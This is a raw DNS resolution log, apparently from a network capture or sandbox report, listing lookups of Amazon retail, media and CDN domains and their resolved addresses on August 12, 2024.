                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.169960976 CEST1.1.1.1192.168.2.40x6f54No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170120001 CEST1.1.1.1192.168.2.40x59cbNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170120001 CEST1.1.1.1192.168.2.40x59cbNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170120001 CEST1.1.1.1192.168.2.40x59cbNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170120001 CEST1.1.1.1192.168.2.40x59cbNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170120001 CEST1.1.1.1192.168.2.40x59cbNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170120001 CEST1.1.1.1192.168.2.40x59cbNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170120001 CEST1.1.1.1192.168.2.40x59cbNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170149088 CEST1.1.1.1192.168.2.40xe0b8No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170149088 CEST1.1.1.1192.168.2.40xe0b8No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170149088 CEST1.1.1.1192.168.2.40xe0b8No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.170909882 CEST1.1.1.1192.168.2.40xa99fNo error (0)completion.amazon.com44.215.138.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.713959932 CEST1.1.1.1192.168.2.40xe871No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.713959932 CEST1.1.1.1192.168.2.40xe871No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.713959932 CEST1.1.1.1192.168.2.40xe871No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.713973999 CEST1.1.1.1192.168.2.40xd4c3No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.713973999 CEST1.1.1.1192.168.2.40xd4c3No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.713973999 CEST1.1.1.1192.168.2.40xd4c3No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.713973999 CEST1.1.1.1192.168.2.40xd4c3No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.713973999 CEST1.1.1.1192.168.2.40xd4c3No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.713973999 CEST1.1.1.1192.168.2.40xd4c3No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.713973999 CEST1.1.1.1192.168.2.40xd4c3No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:26.041882038 CEST1.1.1.1192.168.2.40x784bName error (3)amazon.partners.tremorhub.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:26.042958975 CEST1.1.1.1192.168.2.40x7b25Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:26.053121090 CEST1.1.1.1192.168.2.40x199cName error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174691916 CEST1.1.1.1192.168.2.40x4c8eNo error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174691916 CEST1.1.1.1192.168.2.40x4c8eNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174691916 CEST1.1.1.1192.168.2.40x4c8eNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174691916 CEST1.1.1.1192.168.2.40x4c8eNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174691916 CEST1.1.1.1192.168.2.40x4c8eNo error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174691916 CEST1.1.1.1192.168.2.40x4c8eNo error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174691916 CEST1.1.1.1192.168.2.40x4c8eNo error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174691916 CEST1.1.1.1192.168.2.40x4c8eNo error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174786091 CEST1.1.1.1192.168.2.40xbe46No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174786091 CEST1.1.1.1192.168.2.40xbe46No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.174786091 CEST1.1.1.1192.168.2.40xbe46No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.483617067 CEST1.1.1.1192.168.2.40xf07fNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.483617067 CEST1.1.1.1192.168.2.40xf07fNo error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.483617067 CEST1.1.1.1192.168.2.40xf07fNo error (0)dlsq0ztllwnya.cloudfront.net18.239.36.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.483617067 CEST1.1.1.1192.168.2.40xf07fNo error (0)dlsq0ztllwnya.cloudfront.net18.239.36.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.483617067 CEST1.1.1.1192.168.2.40xf07fNo error (0)dlsq0ztllwnya.cloudfront.net18.239.36.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.483617067 CEST1.1.1.1192.168.2.40xf07fNo error (0)dlsq0ztllwnya.cloudfront.net18.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.502159119 CEST1.1.1.1192.168.2.40x12adNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.502159119 CEST1.1.1.1192.168.2.40x12adNo error (0)tp.c9a5976c7-frontier.amazon.aewww.amazon.ae.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.625422001 CEST1.1.1.1192.168.2.40x3dcdNo error (0)static.siege-amazon.com65.9.66.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.625422001 CEST1.1.1.1192.168.2.40x3dcdNo error (0)static.siege-amazon.com65.9.66.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.625422001 CEST1.1.1.1192.168.2.40x3dcdNo error (0)static.siege-amazon.com65.9.66.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.625422001 CEST1.1.1.1192.168.2.40x3dcdNo error (0)static.siege-amazon.com65.9.66.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.216.117.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.19.87.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)endpoint.prod.eu-west-1.forester.a2z.com99.80.93.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.154.24.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.30.185.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.30.238.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.77.106.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.063829899 CEST1.1.1.1192.168.2.40x305bNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.73.209.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.123183966 CEST1.1.1.1192.168.2.40x673dName error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.123639107 CEST1.1.1.1192.168.2.40x25bdName error (3)amazon.partners.tremorhub.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.150392056 CEST1.1.1.1192.168.2.40xac3aNo error (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net108.157.244.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.150392056 CEST1.1.1.1192.168.2.40xac3aNo error (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net108.157.244.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.150392056 CEST1.1.1.1192.168.2.40xac3aNo error (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net108.157.244.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.150392056 CEST1.1.1.1192.168.2.40xac3aNo error (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net108.157.244.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.259716988 CEST1.1.1.1192.168.2.40x269fNo error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.259716988 CEST1.1.1.1192.168.2.40x269fNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.259716988 CEST1.1.1.1192.168.2.40x269fNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.641531944 CEST1.1.1.1192.168.2.40xae89No error (0)static.siege-amazon.com18.239.83.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.641531944 CEST1.1.1.1192.168.2.40xae89No error (0)static.siege-amazon.com18.239.83.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.641531944 CEST1.1.1.1192.168.2.40xae89No error (0)static.siege-amazon.com18.239.83.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.641531944 CEST1.1.1.1192.168.2.40xae89No error (0)static.siege-amazon.com18.239.83.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.19.51.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.77.134.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.51.20.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.16.204.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.246.165.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.250.162.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.215.131.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.631536007 CEST1.1.1.1192.168.2.40xa275No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.154.136.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.664004087 CEST1.1.1.1192.168.2.40x9c90No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.664004087 CEST1.1.1.1192.168.2.40x9c90No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.664004087 CEST1.1.1.1192.168.2.40x9c90No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.966677904 CEST1.1.1.1192.168.2.40x576aNo error (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net108.157.244.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.966677904 CEST1.1.1.1192.168.2.40x576aNo error (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net108.157.244.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.966677904 CEST1.1.1.1192.168.2.40x576aNo error (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net108.157.244.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.966677904 CEST1.1.1.1192.168.2.40x576aNo error (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net108.157.244.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:32.014928102 CEST1.1.1.1192.168.2.40x2fe0No error (0)unagi-eu.amazon.com52.95.122.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.129630089 CEST1.1.1.1192.168.2.40xbc1cNo error (0)www.amazon.detp.abe2c2f23-frontier.amazon.deCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.129630089 CEST1.1.1.1192.168.2.40xbc1cNo error (0)tp.abe2c2f23-frontier.amazon.dedjvbdz1obemzo.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.129630089 CEST1.1.1.1192.168.2.40xbc1cNo error (0)djvbdz1obemzo.cloudfront.net18.239.16.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.130285025 CEST1.1.1.1192.168.2.40xa85cNo error (0)www.amazon.detp.abe2c2f23-frontier.amazon.deCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.130285025 CEST1.1.1.1192.168.2.40xa85cNo error (0)tp.abe2c2f23-frontier.amazon.dedjvbdz1obemzo.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396631956 CEST1.1.1.1192.168.2.40xb726No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396631956 CEST1.1.1.1192.168.2.40xb726No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396631956 CEST1.1.1.1192.168.2.40xb726No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.213.182.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396631956 CEST1.1.1.1192.168.2.40xb726No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.209.66.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396631956 CEST1.1.1.1192.168.2.40xb726No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.78.35.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396631956 CEST1.1.1.1192.168.2.40xb726No error (0)endpoint.prod.eu-west-1.forester.a2z.com99.81.242.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396631956 CEST1.1.1.1192.168.2.40xb726No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.194.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396631956 CEST1.1.1.1192.168.2.40xb726No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.155.72.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396631956 CEST1.1.1.1192.168.2.40xb726No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.251.46.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396631956 CEST1.1.1.1192.168.2.40xb726No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.49.71.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396928072 CEST1.1.1.1192.168.2.40x761No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.396928072 CEST1.1.1.1192.168.2.40x761No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474363089 CEST1.1.1.1192.168.2.40x1742No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474363089 CEST1.1.1.1192.168.2.40x1742No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474363089 CEST1.1.1.1192.168.2.40x1742No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.194.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474363089 CEST1.1.1.1192.168.2.40x1742No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.155.30.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474363089 CEST1.1.1.1192.168.2.40x1742No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.78.35.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474363089 CEST1.1.1.1192.168.2.40x1742No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.213.203.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474363089 CEST1.1.1.1192.168.2.40x1742No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.209.129.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474363089 CEST1.1.1.1192.168.2.40x1742No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.76.151.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474363089 CEST1.1.1.1192.168.2.40x1742No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.49.71.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474363089 CEST1.1.1.1192.168.2.40x1742No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.155.72.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474809885 CEST1.1.1.1192.168.2.40x9dNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.474809885 CEST1.1.1.1192.168.2.40x9dNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:35.200145006 CEST1.1.1.1192.168.2.40x81f9No error (0)www.amazon.detp.abe2c2f23-frontier.amazon.deCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:35.200145006 CEST1.1.1.1192.168.2.40x81f9No error (0)tp.abe2c2f23-frontier.amazon.dewww.amazon.de.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:35.200189114 CEST1.1.1.1192.168.2.40x419cNo error (0)www.amazon.detp.abe2c2f23-frontier.amazon.deCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:35.200189114 CEST1.1.1.1192.168.2.40x419cNo error (0)tp.abe2c2f23-frontier.amazon.dedjvbdz1obemzo.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:42.845267057 CEST1.1.1.1192.168.2.40x9d5eName error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:43.039231062 CEST1.1.1.1192.168.2.40x99c9No error (0)d1nruqhae353qc.cloudfront.net18.239.63.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:43.039231062 CEST1.1.1.1192.168.2.40x99c9No error (0)d1nruqhae353qc.cloudfront.net18.239.63.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:43.039231062 CEST1.1.1.1192.168.2.40x99c9No error (0)d1nruqhae353qc.cloudfront.net18.239.63.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:43.039231062 CEST1.1.1.1192.168.2.40x99c9No error (0)d1nruqhae353qc.cloudfront.net18.239.63.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.572503090 CEST1.1.1.1192.168.2.40xdacdNo error (0)d2h8zr0m6mus4x.cloudfront.net13.32.118.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.572503090 CEST1.1.1.1192.168.2.40xdacdNo error (0)d2h8zr0m6mus4x.cloudfront.net13.32.118.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.572503090 CEST1.1.1.1192.168.2.40xdacdNo error (0)d2h8zr0m6mus4x.cloudfront.net13.32.118.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.572503090 CEST1.1.1.1192.168.2.40xdacdNo error (0)d2h8zr0m6mus4x.cloudfront.net13.32.118.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.603673935 CEST1.1.1.1192.168.2.40x8d4aNo error (0)d1nruqhae353qc.cloudfront.net18.239.63.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.603673935 CEST1.1.1.1192.168.2.40x8d4aNo error (0)d1nruqhae353qc.cloudfront.net18.239.63.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.603673935 CEST1.1.1.1192.168.2.40x8d4aNo error (0)d1nruqhae353qc.cloudfront.net18.239.63.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.603673935 CEST1.1.1.1192.168.2.40x8d4aNo error (0)d1nruqhae353qc.cloudfront.net18.239.63.207A (IP address)IN (0x0001)false
